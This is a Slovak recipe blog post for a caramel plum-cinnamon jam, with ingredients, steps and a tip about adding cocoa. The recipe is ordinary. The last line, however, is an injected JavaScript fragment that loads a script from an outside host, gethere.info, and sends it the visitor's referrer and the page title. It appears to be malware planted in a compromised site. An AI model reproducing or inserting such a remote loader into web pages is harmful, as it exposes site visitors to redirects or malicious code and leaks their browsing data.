FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Homemade / Karamelový slivkovo-škoricový lekvár

Karamelový slivkovo-škoricový lekvár

27/08/2015 by Martina Leave a Comment

Vyzerá to tak, že pre mňa a moje tvorenie v kuchyni je leto už na odchode… :)

Predstava o slivkách, jablkách, škorici a tekvici u mňa spôsobuje až triašku :). Len či je to od prichádzajúceho sychravého počasia, alebo vzrušenia.

Slivky so škoricou sú tak dokonalé spojenie, že ani neviem, či je potrebné niečo k tomu ešte dodať. A prečo sme použili slovné spojenie karamelový lekvár? Preto karamelový, lebo slivky sú jemne dosladené kokosovým cukrom :) A ten na naše veľké potešenie prirodzene vonia aj chutí po karameli.

Tak čo hovoríte, vyskúšate ho aj Vy? :)

slivka-skorica

Ingrediencie: (asi 2l lekváru)

  • 3,5kg sliviek
  • 3 + 3 lyžice kokosového cukru
  • 1 + 2 lyžičky škorice

Postup:

  1. Deň vopred slivky poriadne umyte, odkôstkujte a nakrájajte na menšie kúsky (polovice, štvrtiny).
  2. Posypte 3 lyžicami kokosového cukru a jednou lyžičkou škorice. Poriadne premiešajte a prikryte na noc fóliou.
  3. Na druhý deň ich dajte za občasného premiešania variť na slabom plameni asi 3-4 hodiny.
  4. Kokosový cukor a škoricu som pridala až na poslednú polhodinu varenia. Predsa len som až do poslednej chvíle nevedela koľko cukru a škorice chcem naozaj použiť :).
  5. Prelejte lekvár do čistých pohárov, uzavrite ich a sterilizujte.

* ja som použila takú fintu, že som do poslednej várky (asi 370ml) pridala 1 lyžicu kvalitného kakaa :)) – potom lekvár chutí ako slivkové gule s grankom <3

Božský french toast :))

Božský french toast :))

Print
Karamelový slivkovo-škoricový lekvár

Karamelový slivkovo-škoricový lekvár

Ingredients

  • 3,5kg sliviek
  • 3 + 3 lyžice kokosového cukru
  • 1 + 2 lyžičky škorice

Instructions

  1. Deň vopred slivky poriadne umyte, odkôstkujte a nakrájajte na menšie kúsky (polovice, štvrtiny).
  2. Posypte 3 lyžicami kokosového cukru a jednou lyžičkou škorice. Poriadne premiešajte a prikryte na noc fóliou.
  3. Na druhý deň ich dajte za občasného premiešania variť na slabom plameni asi 3-4 hodiny.
  4. Kokosový cukor a škoricu som pridala až na poslednú polhodinu varenia. Predsa len som až do poslednej chvíle nevedela koľko cukru a škorice chcem naozaj použiť :).
  5. Prelejte lekvár do čistých pohárov, uzavrite ich a sterilizujte.

Notes

* ja som použila takú fintu, že som do poslednej várky (asi 370ml) pridala 1 lyžicu kvalitného kakaa :)) – potom lekvár chutí ako slivkové gule s grankom <3

5.0

IMG_9704

 

ja v akcii.. :)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;